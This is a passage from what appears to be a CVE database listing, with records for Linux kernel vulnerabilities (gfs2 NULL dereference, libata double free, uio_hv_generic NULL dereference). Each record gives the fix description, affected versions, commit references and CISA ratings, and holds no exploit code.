                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.200",
                  "versionStartIncluding": "5.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.162",
                  "versionStartIncluding": "5.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "5.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "5.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix NULL pointer dereference in gfs2_log_flush\n\nIn gfs2_jindex_free(), set sdp-\u003esd_jdesc to NULL under the log flush\nlock to provide exclusion against gfs2_log_flush().\n\nIn gfs2_log_flush(), check if sdp-\u003esd_jdesc is non-NULL before\ndereferencing it.  Otherwise, we could run into a NULL pointer\ndereference when outstanding glock work races with an unmount\n(glock_work_func -\u003e run_queue -\u003e do_xmote -\u003e inode_go_sync -\u003e\ngfs2_log_flush)."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-12T08:19:19.560Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c3c5cfa3170c0940bc66a142859caac07d19b9d6"
        },
        {
          "url": "https://git.kernel.org/stable/c/5f6a84cfb33b34610623857bd93919dcb661e29b"
        },
        {
          "url": "https://git.kernel.org/stable/c/3429ef5f50909cee9e498c50f0c499b9397116ce"
        },
        {
          "url": "https://git.kernel.org/stable/c/f54f9d5368a4e92ede7dd078a62788dae3a7c6ef"
        },
        {
          "url": "https://git.kernel.org/stable/c/35264909e9d1973ab9aaa2a1b07cda70f12bb828"
        }
      ],
      "title": "gfs2: Fix NULL pointer dereference in gfs2_log_flush",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42079",
    "datePublished": "2024-07-29T15:52:41.360Z",
    "dateReserved": "2024-07-29T15:50:41.169Z",
    "dateUpdated": "2026-02-12T08:19:19.560Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41087 (GCVE-0-2024-41087)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:48 – Updated: 2025-11-03 22:00

Title

ata: libata-core: Fix double free on error

Summary

In the Linux kernel, the following vulnerability has been resolved: ata: libata-core: Fix double free on error If e.g. the ata_port_alloc() call in ata_host_alloc() fails, we will jump to the err_out label, which will call devres_release_group(). devres_release_group() will trigger a call to ata_host_release(). ata_host_release() calls kfree(host), so executing the kfree(host) in ata_host_alloc() will lead to a double free: kernel BUG at mm/slub.c:553! Oops: invalid opcode: 0000 [#1] PREEMPT SMP NOPTI CPU: 11 PID: 599 Comm: (udev-worker) Not tainted 6.10.0-rc5 #47 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014 RIP: 0010:kfree+0x2cf/0x2f0 Code: 5d 41 5e 41 5f 5d e9 80 d6 ff ff 4d 89 f1 41 b8 01 00 00 00 48 89 d9 48 89 da RSP: 0018:ffffc90000f377f0 EFLAGS: 00010246 RAX: ffff888112b1f2c0 RBX: ffff888112b1f2c0 RCX: ffff888112b1f320 RDX: 000000000000400b RSI: ffffffffc02c9de5 RDI: ffff888112b1f2c0 RBP: ffffc90000f37830 R08: 0000000000000000 R09: 0000000000000000 R10: ffffc90000f37610 R11: 617461203a736b6e R12: ffffea00044ac780 R13: ffff888100046400 R14: ffffffffc02c9de5 R15: 0000000000000006 FS: 00007f2f1cabe980(0000) GS:ffff88813b380000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f2f1c3acf75 CR3: 0000000111724000 CR4: 0000000000750ef0 PKRU: 55555554 Call Trace: <TASK> ? __die_body.cold+0x19/0x27 ? die+0x2e/0x50 ? do_trap+0xca/0x110 ? do_error_trap+0x6a/0x90 ? kfree+0x2cf/0x2f0 ? exc_invalid_op+0x50/0x70 ? kfree+0x2cf/0x2f0 ? asm_exc_invalid_op+0x1a/0x20 ? ata_host_alloc+0xf5/0x120 [libata] ? ata_host_alloc+0xf5/0x120 [libata] ? kfree+0x2cf/0x2f0 ata_host_alloc+0xf5/0x120 [libata] ata_host_alloc_pinfo+0x14/0xa0 [libata] ahci_init_one+0x6c9/0xd20 [ahci] Ensure that we will not call kfree(host) twice, by performing the kfree() only if the devres_open_group() call failed.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/290073b2b557e4dc2…
	https://git.kernel.org/stable/c/56f1c7e290cd6c69c…
	https://git.kernel.org/stable/c/010de9acbea58fbcb…
	https://git.kernel.org/stable/c/5dde5f8b790274723…
	https://git.kernel.org/stable/c/702c1edbafb2e6f9d…
	https://git.kernel.org/stable/c/062e256516d7db5e7…
	https://git.kernel.org/stable/c/8106da4d88bbaed80…
	https://git.kernel.org/stable/c/ab9e0c529eb7cafeb…

Impacted products

Vendor

Product

Version

Linux

Affected: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc , < 290073b2b557e4dc21ee74a1e403d9ae79e393a2 (git)
Affected: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc , < 56f1c7e290cd6c69c948fcd2e2a49e6a637ec38f (git)
Affected: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc , < 010de9acbea58fbcbda08e3793d6262086a493fe (git)
Affected: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc , < 5dde5f8b790274723640d29a07c5a97d57d62047 (git)
Affected: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc , < 702c1edbafb2e6f9d20f6d391273b5be09d366a5 (git)
Affected: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc , < 062e256516d7db5e7dcdef117f52025cd5c456e3 (git)
Affected: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc , < 8106da4d88bbaed809e023cc8014b766223d6e76 (git)
Affected: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc , < ab9e0c529eb7cafebdd31fe1644524e80a48b05d (git)

Linux

Affected: 4.17
Unaffected: 0 , < 4.17 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:41.841Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/290073b2b557e4dc21ee74a1e403d9ae79e393a2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/56f1c7e290cd6c69c948fcd2e2a49e6a637ec38f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/010de9acbea58fbcbda08e3793d6262086a493fe"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5dde5f8b790274723640d29a07c5a97d57d62047"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/702c1edbafb2e6f9d20f6d391273b5be09d366a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/062e256516d7db5e7dcdef117f52025cd5c456e3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8106da4d88bbaed809e023cc8014b766223d6e76"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ab9e0c529eb7cafebdd31fe1644524e80a48b05d"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41087",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:20:45.691103Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:58.682Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/ata/libata-core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "290073b2b557e4dc21ee74a1e403d9ae79e393a2",
              "status": "affected",
              "version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
              "versionType": "git"
            },
            {
              "lessThan": "56f1c7e290cd6c69c948fcd2e2a49e6a637ec38f",
              "status": "affected",
              "version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
              "versionType": "git"
            },
            {
              "lessThan": "010de9acbea58fbcbda08e3793d6262086a493fe",
              "status": "affected",
              "version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
              "versionType": "git"
            },
            {
              "lessThan": "5dde5f8b790274723640d29a07c5a97d57d62047",
              "status": "affected",
              "version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
              "versionType": "git"
            },
            {
              "lessThan": "702c1edbafb2e6f9d20f6d391273b5be09d366a5",
              "status": "affected",
              "version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
              "versionType": "git"
            },
            {
              "lessThan": "062e256516d7db5e7dcdef117f52025cd5c456e3",
              "status": "affected",
              "version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
              "versionType": "git"
            },
            {
              "lessThan": "8106da4d88bbaed809e023cc8014b766223d6e76",
              "status": "affected",
              "version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
              "versionType": "git"
            },
            {
              "lessThan": "ab9e0c529eb7cafebdd31fe1644524e80a48b05d",
              "status": "affected",
              "version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/ata/libata-core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.17"
            },
            {
              "lessThan": "4.17",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-core: Fix double free on error\n\nIf e.g. the ata_port_alloc() call in ata_host_alloc() fails, we will jump\nto the err_out label, which will call devres_release_group().\ndevres_release_group() will trigger a call to ata_host_release().\nata_host_release() calls kfree(host), so executing the kfree(host) in\nata_host_alloc() will lead to a double free:\n\nkernel BUG at mm/slub.c:553!\nOops: invalid opcode: 0000 [#1] PREEMPT SMP NOPTI\nCPU: 11 PID: 599 Comm: (udev-worker) Not tainted 6.10.0-rc5 #47\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:kfree+0x2cf/0x2f0\nCode: 5d 41 5e 41 5f 5d e9 80 d6 ff ff 4d 89 f1 41 b8 01 00 00 00 48 89 d9 48 89 da\nRSP: 0018:ffffc90000f377f0 EFLAGS: 00010246\nRAX: ffff888112b1f2c0 RBX: ffff888112b1f2c0 RCX: ffff888112b1f320\nRDX: 000000000000400b RSI: ffffffffc02c9de5 RDI: ffff888112b1f2c0\nRBP: ffffc90000f37830 R08: 0000000000000000 R09: 0000000000000000\nR10: ffffc90000f37610 R11: 617461203a736b6e R12: ffffea00044ac780\nR13: ffff888100046400 R14: ffffffffc02c9de5 R15: 0000000000000006\nFS:  00007f2f1cabe980(0000) GS:ffff88813b380000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f2f1c3acf75 CR3: 0000000111724000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n ? __die_body.cold+0x19/0x27\n ? die+0x2e/0x50\n ? do_trap+0xca/0x110\n ? do_error_trap+0x6a/0x90\n ? kfree+0x2cf/0x2f0\n ? exc_invalid_op+0x50/0x70\n ? kfree+0x2cf/0x2f0\n ? asm_exc_invalid_op+0x1a/0x20\n ? ata_host_alloc+0xf5/0x120 [libata]\n ? ata_host_alloc+0xf5/0x120 [libata]\n ? kfree+0x2cf/0x2f0\n ata_host_alloc+0xf5/0x120 [libata]\n ata_host_alloc_pinfo+0x14/0xa0 [libata]\n ahci_init_one+0x6c9/0xd20 [ahci]\n\nEnsure that we will not call kfree(host) twice, by performing the kfree()\nonly if the devres_open_group() call failed."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:21:47.923Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/290073b2b557e4dc21ee74a1e403d9ae79e393a2"
        },
        {
          "url": "https://git.kernel.org/stable/c/56f1c7e290cd6c69c948fcd2e2a49e6a637ec38f"
        },
        {
          "url": "https://git.kernel.org/stable/c/010de9acbea58fbcbda08e3793d6262086a493fe"
        },
        {
          "url": "https://git.kernel.org/stable/c/5dde5f8b790274723640d29a07c5a97d57d62047"
        },
        {
          "url": "https://git.kernel.org/stable/c/702c1edbafb2e6f9d20f6d391273b5be09d366a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/062e256516d7db5e7dcdef117f52025cd5c456e3"
        },
        {
          "url": "https://git.kernel.org/stable/c/8106da4d88bbaed809e023cc8014b766223d6e76"
        },
        {
          "url": "https://git.kernel.org/stable/c/ab9e0c529eb7cafebdd31fe1644524e80a48b05d"
        }
      ],
      "title": "ata: libata-core: Fix double free on error",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41087",
    "datePublished": "2024-07-29T15:48:03.127Z",
    "dateReserved": "2024-07-12T12:17:45.634Z",
    "dateUpdated": "2025-11-03T22:00:41.841Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46739 (GCVE-0-2024-46739)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2025-11-03 22:17

Title

uio_hv_generic: Fix kernel NULL pointer dereference in hv_uio_rescind

Summary

In the Linux kernel, the following vulnerability has been resolved: uio_hv_generic: Fix kernel NULL pointer dereference in hv_uio_rescind For primary VM Bus channels, primary_channel pointer is always NULL. This pointer is valid only for the secondary channels. Also, rescind callback is meant for primary channels only. Fix NULL pointer dereference by retrieving the device_obj from the parent for the primary channel.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3d414b64ecf6fd717…
	https://git.kernel.org/stable/c/f38f46da80a2ab7d1…
	https://git.kernel.org/stable/c/1d8e020e51ab07e40…
	https://git.kernel.org/stable/c/3005091cd537ef8cd…
	https://git.kernel.org/stable/c/2be373469be1774bb…
	https://git.kernel.org/stable/c/de6946be9c8bc7d22…
	https://git.kernel.org/stable/c/928e399e84f4e8030…
	https://git.kernel.org/stable/c/fb1adbd7e50f3d2de…

Impacted products

Vendor

Product

Version

Linux

Affected: ca3cda6fcf1e922213a0cc58e708ffb999151db3 , < 3d414b64ecf6fd717d7510ffb893c6f23acbf50e (git)
Affected: ca3cda6fcf1e922213a0cc58e708ffb999151db3 , < f38f46da80a2ab7d1b2f8fcb444c916034a2dac4 (git)
Affected: ca3cda6fcf1e922213a0cc58e708ffb999151db3 , < 1d8e020e51ab07e40f9dd00b52f1da7d96fec04c (git)
Affected: ca3cda6fcf1e922213a0cc58e708ffb999151db3 , < 3005091cd537ef8cdb7530dcb2ecfba8d2ef475c (git)
Affected: ca3cda6fcf1e922213a0cc58e708ffb999151db3 , < 2be373469be1774bbe03b0fa7e2854e65005b1cc (git)
Affected: ca3cda6fcf1e922213a0cc58e708ffb999151db3 , < de6946be9c8bc7d2279123433495af7c21011b99 (git)
Affected: ca3cda6fcf1e922213a0cc58e708ffb999151db3 , < 928e399e84f4e80307dce44e89415115c473275b (git)
Affected: ca3cda6fcf1e922213a0cc58e708ffb999151db3 , < fb1adbd7e50f3d2de56d0a2bb0700e2e819a329e (git)

Linux

Affected: 4.16
Unaffected: 0 , < 4.16 (semver)
Unaffected: 4.19.322 , ≤ 4.19.* (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46739",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:50:50.219661Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:51:05.681Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:17:26.500Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/uio/uio_hv_generic.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3d414b64ecf6fd717d7510ffb893c6f23acbf50e",
              "status": "affected",
              "version": "ca3cda6fcf1e922213a0cc58e708ffb999151db3",
              "versionType": "git"
            },
            {
              "lessThan": "f38f46da80a2ab7d1b2f8fcb444c916034a2dac4",
              "status": "affected",
              "version": "ca3cda6fcf1e922213a0cc58e708ffb999151db3",
              "versionType": "git"
            },
            {
              "lessThan": "1d8e020e51ab07e40f9dd00b52f1da7d96fec04c",
              "status": "affected",
              "version": "ca3cda6fcf1e922213a0cc58e708ffb999151db3",
              "versionType": "git"
            },
            {
              "lessThan": "3005091cd537ef8cdb7530dcb2ecfba8d2ef475c",
              "status": "affected",
              "version": "ca3cda6fcf1e922213a0cc58e708ffb999151db3",
              "versionType": "git"
            },
            {
              "lessThan": "2be373469be1774bbe03b0fa7e2854e65005b1cc",
              "status": "affected",
              "version": "ca3cda6fcf1e922213a0cc58e708ffb999151db3",
              "versionType": "git"
            },
            {
              "lessThan": "de6946be9c8bc7d2279123433495af7c21011b99",
              "status": "affected",
              "version": "ca3cda6fcf1e922213a0cc58e708ffb999151db3",
              "versionType": "git"
            },
            {
              "lessThan": "928e399e84f4e80307dce44e89415115c473275b",
              "status": "affected",
              "version": "ca3cda6fcf1e922213a0cc58e708ffb999151db3",
              "versionType": "git"
            },
            {
              "lessThan": "fb1adbd7e50f3d2de56d0a2bb0700e2e819a329e",
              "status": "affected",
              "version": "ca3cda6fcf1e922213a0cc58e708ffb999151db3",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/uio/uio_hv_generic.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.16"
            },
            {
              "lessThan": "4.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.322",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.322",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nuio_hv_generic: Fix kernel NULL pointer dereference in hv_uio_rescind\n\nFor primary VM Bus channels, primary_channel pointer is always NULL. This\npointer is valid only for the secondary channels. Also, rescind callback\nis meant for primary channels only.\n\nFix NULL pointer dereference by retrieving the device_obj from the parent\nfor the primary channel."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:33:08.114Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3d414b64ecf6fd717d7510ffb893c6f23acbf50e"
        },
        {
          "url": "https://git.kernel.org/stable/c/f38f46da80a2ab7d1b2f8fcb444c916034a2dac4"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d8e020e51ab07e40f9dd00b52f1da7d96fec04c"
        },
        {
          "url": "https://git.kernel.org/stable/c/3005091cd537ef8cdb7530dcb2ecfba8d2ef475c"
        },
        {
          "url": "https://git.kernel.org/stable/c/2be373469be1774bbe03b0fa7e2854e65005b1cc"
        },
        {
          "url": "https://git.kernel.org/stable/c/de6946be9c8bc7d2279123433495af7c21011b99"
        },
        {
          "url": "https://git.kernel.org/stable/c/928e399e84f4e80307dce44e89415115c473275b"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb1adbd7e50f3d2de56d0a2bb0700e2e819a329e"
        }
      ],
      "title": "uio_hv_generic: Fix kernel NULL pointer dereference in hv_uio_rescind",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46739",
    "datePublished": "2024-09-18T07:12:00.897Z",
    "dateReserved": "2024-09-11T15:12:18.263Z",
    "dateUpdated": "2025-11-03T22:17:26.500Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-44971 (GCVE-0-2024-44971)

Vulnerability from cvelistv5 – Published: 2024-09-04 18:56 – Updated: 2025-11-03 22:14

Title

net: dsa: bcm_sf2: Fix a possible memory leak in bcm_sf2_mdio_register()

Summary

